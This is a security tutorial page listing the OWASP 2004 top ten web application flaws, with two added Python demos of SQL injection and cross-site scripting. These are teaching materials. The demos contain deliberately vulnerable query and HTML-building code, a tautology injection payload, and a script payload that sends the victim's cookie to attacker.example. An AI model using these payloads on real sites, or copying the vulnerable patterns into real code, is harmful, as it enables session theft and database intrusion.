Top 10 Most Critical Web Application Security Flaws
The following list was drawn up by the Open Web Application Security
Project (OWASP) as its ranking of the ten most critical web application
vulnerabilities for 2004.
The ten flaws
in the OWASP list are:
1. Unvalidated input.
Information from web requests is not validated before the application
uses it. Attackers can use these flaws to attack backend components
(databases, the operating system, other systems) through the web
application.
2. Broken access control.
Restrictions on what authenticated users are allowed to do are not
properly enforced, so attackers can access other users' accounts or
invoke functions they are not authorized to use.
3. Broken authentication and session management.
Account
credentials and session tokens are not properly protected,
allowing attackers to compromise passwords, keys, session
cookies or tokens, and assume the identities of other users.
4. Cross-site scripting.
The web application can be used as a mechanism to transport an attack
to the end user's browser. A successful attack can disclose the end
user's session token or spoof content to fool the user.
5. Buffer overflows.
Web application components written in languages that do not perform
bounds checking (such as C and C++) can be crashed by oversized input
and, in some cases, made to execute attacker-supplied code and take
control of the process.
6. Injection flaws.
Web applications pass parameters to external systems such as databases,
or to the local operating system, when they call them. If an attacker
can embed commands (SQL, shell commands, and so on) in those
parameters, the external system executes them with the web
application's privileges.
7. Improper error handling.
Error conditions that arise during normal operation are not handled
properly. Verbose error messages can give attackers detailed system
information (stack traces, file paths, database structure), and
unhandled errors can be triggered deliberately to cause a denial of
service.
8. Insecure storage.
Web applications frequently use cryptographic functions to protect
information and credentials, but these functions and the code around
them have proven difficult to get right (home-grown algorithms, poorly
managed keys, reversible or unsalted password storage), resulting in
weak protection.
9. Denial of service.
Attackers consume web application resources (connections, memory,
CPU, database capacity) to the point where other legitimate users can
no longer access or use the application. Attackers can also lock out
user accounts, for example by triggering account-lockout policies, or
cause application failures.
10. Insecure configuration management.
Having a strong server configuration standard is critical to a secure
web application. Web and application servers have many configuration
options that affect security and are not secure out of the box:
unnecessary services, default accounts and sample content should be
removed, and security patches kept current.
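The injection flaw in item 6 (and the unvalidated-input problem in item 1 that makes it possible), shown as an added example that is not part of the original OWASP list or of this page. It uses Python's built-in sqlite3 module with a constructed three-row users table; the function names and the sample rows are assumptions made for the demonstration.

```python
"""Injection flaw (OWASP 2004 item 6) demonstrated against an in-memory
SQLite database: a query built by string concatenation next to a
parameterized one.  Added example, not from the original page; the
schema and rows below are constructed for the demonstration."""
import sqlite3


def make_db():
    """Constructed sample data: three users with hypothetical roles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, name):
    """Deliberately vulnerable: the untrusted parameter is spliced into
    the SQL text, so a quote in `name` ends the string literal and the
    rest of the value becomes part of the query's structure."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Hardened: the parameter is sent separately from the query text,
    so the database treats it as data whatever characters it holds."""
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    attack = "x' OR '1'='1"          # classic tautology payload
    print("vulnerable:", find_user_vulnerable(db, attack))  # every row
    print("safe:      ", find_user_safe(db, attack))        # no rows
```

With the payload `x' OR '1'='1` the concatenated query becomes `... WHERE name = 'x' OR '1'='1'` and returns the whole table; the parameterized query looks for a user literally named `x' OR '1'='1` and returns nothing. Stripping or escaping quotes in the vulnerable version is not the fix: parameterization works because query structure and data reach the database on separate channels.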
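The cross-site scripting flaw in item 4, shown as an added example that is not from the original page: a page fragment that reflects a user-supplied name into HTML with and without output encoding. The template, the function names and the attack payload (which points at the reserved attacker.example host) are constructed for the demonstration.

```python
"""Cross-site scripting (OWASP 2004 item 4): reflecting untrusted input
into an HTML page without output encoding, next to the encoded form.
Added example, not from the original page; the template and payload
are constructed for the demonstration."""
import html


def render_vulnerable(name):
    """Deliberately vulnerable: the raw value is spliced into the markup,
    so tags inside it become part of the page the victim's browser runs."""
    return "<p>Hello, " + name + "!</p>"


def render_safe(name):
    """Hardened: HTML-encode the value for its output context (element
    body or quoted attribute) so the browser renders it as text."""
    return "<p>Hello, " + html.escape(name, quote=True) + "!</p>"


def contains_live_tag(page, tag="<script"):
    """Helper for checking a rendered page: is there an unencoded tag?"""
    return tag in page.lower()


if __name__ == "__main__":
    # Constructed payload: exfiltrates the victim's cookie to a host the
    # attacker controls (attacker.example is a reserved example domain).
    payload = ("<script>document.location="
               "'http://attacker.example/?c='+document.cookie</script>")
    print(render_vulnerable(payload))   # browser executes the script
    print(render_safe(payload))         # browser shows it as text
```

html.escape covers element content and quoted attribute values. A value placed into a JavaScript block, a URL, a CSS property or an unquoted attribute needs the encoding for that context, which this example does not cover; choosing the encoder per output context is the rule, not escaping once at input time.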
Copyright © Sentry Digital Information Systems